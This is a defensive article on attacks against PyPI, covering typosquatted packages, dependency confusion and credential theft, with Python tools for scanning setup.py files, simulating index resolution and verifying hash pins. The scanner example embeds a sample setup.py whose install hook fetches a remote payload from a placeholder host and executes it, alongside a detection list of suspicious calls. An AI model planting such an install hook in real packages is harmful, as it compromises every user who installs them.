The Most Dangerous Attacks Found on PyPI

PyPI, or the Python Package Index, is a repository of software packages for the Python programming language. It is a hub where Python developers can publish and share their libraries and packages. PyPI makes it easier for others to discover, install, and use Python software components.

As of 2023, the index hosts over 445,000 packages, so it is no surprise that PyPI is a critical resource in the Python ecosystem and is used by developers worldwide.

Sadly, as with any online platform, PyPI and its users are exposed to a range of attacks. Its open publishing model, under which anyone can register an account and upload a package under any unclaimed name with no review before publication, makes it a particularly attractive target for bad actors. Let’s have a look at some of the most critical attacks that may affect PyPI and its users:

Malicious Package Uploads

Malicious package uploads are by far the most significant risk in the PyPI catalog. The volume of malicious packages became so high that in May 2023 the maintainers temporarily halted new user sign-ups and new project registration. Attackers upload packages to PyPI that contain malicious code, usually under a name that resembles, or is a misspelling of, a popular library.

These packages are disguised as legitimate Python libraries, so developers install them without a second look. The payload does not even have to wait until the library is imported: a source distribution’s setup.py runs with the installing user’s privileges during pip install, so malicious code can execute before the package is ever used. Once it runs, it can steal credentials and tokens from the machine, open a backdoor, or compromise the application that depends on it.

One such campaign, reported by Ars Technica, consisted of packages disguised as libraries for various applications; on installation they downloaded a well-known Trojan. Packages like these often go unnoticed by anti-virus software, because the package itself is only a small downloader and the real payload arrives later, which makes them particularly dangerous.
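As an added illustration (not code from the article or from any real package), the script below uses Python’s ast module to triage a source distribution’s setup.py for the install-time execution described above. The setup.py it scans is a constructed sample: totally-legit-lib is a made-up name and example.invalid is a reserved, non-resolving domain.

```python
"""Static triage of a setup.py for code that runs at install time.

Added example, not code from the article. The sample setup.py at the
bottom is constructed for this demonstration; it is not from any real
package, and example.invalid is a reserved, non-resolving domain.
"""
import ast
from typing import List, Optional, Tuple

# Callables a packaging script has no business using. A hit does not
# prove malice, but it is a reason to read the file before installing.
SUSPICIOUS_CALLS = {
    "exec", "eval", "compile", "__import__",
    "os.system", "os.popen",
    "subprocess.run", "subprocess.call", "subprocess.Popen",
    "subprocess.check_output",
    "urllib.request.urlopen", "requests.get", "socket.socket",
    "base64.b64decode",
}


def _dotted_name(node: ast.AST) -> Optional[str]:
    """Turn a Name/Attribute chain such as os.path.join into 'os.path.join'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # call on a call result, a subscript, etc.


def find_install_time_calls(source: str) -> List[Tuple[int, str]]:
    """Return (line number, callee) for every suspicious call in setup.py.

    Module-level code in setup.py runs as soon as pip builds the sdist, and
    methods of a custom install/develop command class run during
    `pip install`, so calls at any nesting depth are reported.
    """
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            callee = _dotted_name(node.func)
            if callee in SUSPICIOUS_CALLS:
                hits.append((node.lineno, callee))
    return sorted(hits)


# Constructed sample: ordinary-looking metadata, but the cmdclass override
# fetches and runs a payload whenever the sdist is installed.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import base64, subprocess, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        blob = urllib.request.urlopen("https://example.invalid/p").read()
        subprocess.run(["python", "-c", base64.b64decode(blob)])

setup(name="totally-legit-lib", version="1.0.0",
      cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for line, callee in find_install_time_calls(SAMPLE_SETUP_PY):
        print(f"line {line}: {callee}")
```

This is a triage aid, not a verdict. Code assembled at runtime, such as getattr(__import__('os'), 'system'), slips past a plain name match, which is why exec, __import__ and base64.b64decode are on the list: their presence in a setup.py is itself the signal. Wheels contain no setup.py and are simply unpacked, so installing with --only-binary=:all: sidesteps the install hook entirely, although malicious code can still run when the package is imported.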

Supply Chain Attacks

Supply chain attacks aim to compromise the integrity of a legitimate package before it reaches PyPI, rather than relying on a fake one. Attackers compromise a maintainer’s development environment, the build process, or the distribution channel to inject malicious code into releases that are then published through the project’s normal channel, so the usual signals of trust (a known name, an established maintainer, a long release history) are all present. Supply chain attacks are becoming increasingly sophisticated, as detailed by InfoSecurity Magazine; the campaign in that report targeted users of popular tools on the index, such as vConnector and eth-tester.

Dependency Confusion

Dependency confusion is a variant of the supply chain attack that exploits how package installers resolve names. Many organizations keep internal packages on a private index and point pip at both that index and PyPI (for example with --extra-index-url). pip treats the two sources as one pool of candidates and installs the highest version it finds, so an attacker who publishes a public package with the same name as an internal one, and a higher version number, gets their code installed in place of the internal package. Developers and build servers install the attacker’s package without changing a single line of configuration, potentially exposing sensitive data or introducing vulnerabilities.

One such attack occurred in December 2022, concerning the popular machine-learning framework PyTorch: a malicious torchtriton package uploaded to PyPI shadowed a dependency that PyTorch’s nightly builds otherwise pulled from PyTorch’s own index.
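An added example, not taken from the article or from pip’s source, that simulates the selection rule behind dependency confusion. The two index catalogs, the acme-internal-utils package and the private index are all constructed; versions are compared as plain dotted integers, a simplification of PEP 440 that is enough to show the rule.

```python
"""Simulating pip's candidate selection across two indexes.

Added example, not code from the article or from pip. The catalogs below
are constructed; 'acme-internal-utils' is a hypothetical internal package.
Versions are treated as dotted integers (real pip implements PEP 440),
which is enough to show why the attacker's upload wins.
"""
from typing import Dict, List, Set, Tuple

Index = Dict[str, List[str]]


def parse_version(v: str) -> Tuple[int, ...]:
    """'1.10.2' -> (1, 10, 2). Assumption: numeric dotted versions only."""
    return tuple(int(part) for part in v.split("."))


# Constructed catalogs. The attacker has published the internal name on
# the public index with an absurdly high version number.
INDEXES: Dict[str, Index] = {
    "pypi": {
        "requests": ["2.30.0", "2.31.0"],
        "acme-internal-utils": ["99.0.0"],
    },
    "private": {
        "acme-internal-utils": ["1.2.0", "1.3.0"],
    },
}
PRIVATE_NAMES: Set[str] = {"acme-internal-utils"}


def resolve_pip_style(name: str, indexes: Dict[str, Index]) -> Tuple[str, str]:
    """What `pip install --extra-index-url <private>` does: every index is
    searched, the candidates are pooled, and the highest version wins no
    matter which index it came from."""
    candidates = [
        (parse_version(v), v, label)
        for label, index in indexes.items()
        for v in index.get(name, [])
    ]
    if not candidates:
        raise LookupError(f"no distribution found for {name}")
    _, version, label = max(candidates)
    return version, label


def resolve_scoped(name: str, indexes: Dict[str, Index], private_names: Set[str],
                   private_label: str = "private", public_label: str = "pypi") -> Tuple[str, str]:
    """Hardened policy: a name declared internal is only ever taken from the
    private index, and everything else only from the public one. Many
    private index servers can enforce this; with plain pip the equivalent
    protection is pinning versions with hashes."""
    label = private_label if name in private_names else public_label
    versions = indexes[label].get(name, [])
    if not versions:
        raise LookupError(f"{name} not found on index {label!r}")
    return max(versions, key=parse_version), label


if __name__ == "__main__":
    print("pip default :", resolve_pip_style("acme-internal-utils", INDEXES))
    print("name-scoped :", resolve_scoped("acme-internal-utils", INDEXES, PRIVATE_NAMES))
```

The first resolver returns the attacker’s 99.0.0 from PyPI, the second the genuine 1.3.0 from the private index. The same pooling rule is why registering a placeholder project on PyPI under each internal name, or serving internal names only from an index that refuses to proxy them, closes the hole.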

Credential Theft

If a PyPI developer’s credentials (username and password, or an upload API token) are compromised, attackers can publish malicious releases under the developer’s name, and an existing, trusted project then delivers harmful code to every user who upgrades. And it’s not just individual developers: the site’s maintainers could also be compromised at some point, as may have been the case in a dangerous hack uncovered by Sonatype in March 2023. PyPI’s response has been to require two-factor authentication for uploads and to offer scoped API tokens and trusted publishing (short-lived tokens issued to a CI workflow) in place of long-lived passwords.

These risks might make PyPI seem like a bleak landscape, but a few bad apples shouldn’t put you off: its benefits outweigh the risks. With a handful of security practices, working with the repository can be both safe and productive.

How to Stay Safe?

Here are some general strategies to help mitigate these attacks:

  • Verify Package Authenticity. Verify the integrity of packages before installation. PyPI no longer accepts PGP signatures on uploads, so the practical check is pinning exact versions together with their sha256 digests and installing with pip’s --require-hashes mode, which refuses any artifact whose digest does not match. Compare the digest with the one listed on the project’s PyPI release page, or with the hash you recorded when you first vetted the package.
  • Dependency Management. Keep your project’s dependencies updated and lock them to exact versions. Use a lock file (Pipfile.lock from pipenv, poetry.lock from poetry, or a requirements.txt generated with pip-compile --generate-hashes) so that every build installs the same artifacts.
  • Multi-Factor Authentication (MFA). Enable two-factor authentication on your PyPI account (PyPI now requires it), and publish releases with scoped API tokens or trusted publishing rather than your password.
  • Use Secure Connections. pip already talks to PyPI over HTTPS and verifies the server certificate, so a VPN adds little against the attacks described here. What matters is not to undermine that channel: keep index URLs on https, never pass --trusted-host to silence certificate errors, and check any proxy or mirror configured in pip.conf, since it sits in a position to serve altered packages.
  • Audit Your Dependencies. Regularly audit your dependency tree for known vulnerabilities with a tool such as pip-audit, which checks installed packages against the Python Packaging Advisory Database, and run it in CI so the check happens on every build.
  • Be Wary of Untrusted Sources. Avoid installing packages from untrusted sources or third-party repositories, and stick to well-known, reputable packages on PyPI. Before adding a dependency, look at its project page: the linked source repository, the maintainer, the release history and the download numbers. A package whose name is one letter away from a popular library, with a single recent release and no repository, deserves a second look.
  • Inspect Packages Before Installing. Anti-virus scanning rarely catches malicious Python packages, so look before you install: pip download --no-deps fetches the artifact without running anything, and you can then read the sdist’s setup.py or pyproject.toml for network calls, subprocess calls or obfuscated strings. Prefer wheels (pip install --only-binary=:all:), which are unpacked rather than executed at install time.
  • Stay Informed. Stay informed about security advisories and updates related to the packages you use. Subscribe to mailing lists or security feeds for timely notifications.
  • Reporting Suspicious Activity. If you encounter a suspicious package or activity on PyPI, report it to the PyPI administrators. The PyPI team actively removes malicious packages, and a single report protects every other user who would otherwise have installed it.
  • Secure Your Development Environment. Follow best practices for securing your machine: keep the operating system and tooling up to date, use a firewall, and install packages into a virtual environment (or a container when trying out unfamiliar code) rather than the system interpreter, so a bad package has less to reach.
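As an added example covering the verification and dependency-management points above (not code from the article or from pip), the script below parses a requirements file in pip’s --require-hashes format and checks an artifact’s sha256 against it. The requirements text, the acme-internal-utils package and the stand-in wheel bytes are constructed; the digest given for requests is a placeholder, not a real release hash.

```python
"""Verifying a downloaded artifact against a hash-pinned requirements file.

Added example, not code from the article or from pip. The requirements
text and the 'wheel' bytes are constructed for this demonstration;
acme-internal-utils is a hypothetical package and the requests digest is
a placeholder.
"""
import hashlib
import re
from typing import Dict, Set, Tuple

# `name==version` exactly; anything looser (>=, ~=, a bare name) is rejected.
EXACT_PIN = re.compile(r"^([A-Za-z0-9_.-]+)==([^\s\\#]+)")
SHA256_OPT = re.compile(r"--hash=sha256:([0-9a-f]{64})")

Pins = Dict[str, Tuple[str, Set[str]]]


def _normalize(name: str) -> str:
    """PyPI treats 'Acme_Utils' and 'acme-utils' as the same project."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_hashed_requirements(text: str) -> Pins:
    """Parse pip's --require-hashes format into {name: (version, {sha256, ...})}.

    Raises ValueError for any requirement that is not pinned to an exact
    version with at least one hash, mirroring what pip does in that mode.
    """
    pins: Pins = {}
    # Backslash-newline continues a requirement onto the next line.
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = EXACT_PIN.match(line)
        if not m:
            raise ValueError(f"not an exact pin: {line!r}")
        hashes = set(SHA256_OPT.findall(line))
        if not hashes:
            raise ValueError(f"{line.split()[0]} has no --hash option")
        pins[_normalize(m.group(1))] = (m.group(2), hashes)
    return pins


def is_fully_pinned(text: str) -> bool:
    """True iff every requirement carries an exact version and a hash."""
    try:
        parse_hashed_requirements(text)
        return True
    except ValueError:
        return False


def verify_bytes(data: bytes, name: str, pins: Pins) -> bool:
    """True iff the artifact's sha256 is one of the digests pinned for `name`."""
    _version, hashes = pins[_normalize(name)]
    return hashlib.sha256(data).hexdigest() in hashes


def verify_file(path: str, name: str, pins: Pins) -> bool:
    with open(path, "rb") as fh:
        return verify_bytes(fh.read(), name, pins)


# Constructed artifact standing in for acme_internal_utils-1.3.0-py3-none-any.whl
GOOD_WHEEL = b"PK\x03\x04 stand-in for acme_internal_utils-1.3.0-py3-none-any.whl"

# Constructed lock file in the format `pip-compile --generate-hashes` writes.
SAMPLE_REQUIREMENTS = f"""\
# constructed; the requests digest is a placeholder, not a real release hash
acme-internal-utils==1.3.0 \\
    --hash=sha256:{hashlib.sha256(GOOD_WHEEL).hexdigest()}
requests==2.31.0 \\
    --hash=sha256:{'0' * 64}
"""

if __name__ == "__main__":
    pins = parse_hashed_requirements(SAMPLE_REQUIREMENTS)
    print("genuine :", verify_bytes(GOOD_WHEEL, "acme_internal_utils", pins))
    print("tampered:", verify_bytes(GOOD_WHEEL + b"\x00", "acme-internal-utils", pins))
```

This is the check pip performs itself with pip install --require-hashes -r requirements.txt; the digest for a file you have vetted comes from pip hash file.whl or from the release’s download page on PyPI. Hash pinning also blunts dependency confusion, because the attacker’s artifact can never match the recorded digest, whichever index it arrives from.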

Remember that cybersecurity is an ongoing process. Stay vigilant and proactive in identifying and mitigating risks, not only on PyPI but with any other online service. Collaboration between maintainers and users is crucial to maintaining the security and integrity of the Python package ecosystem.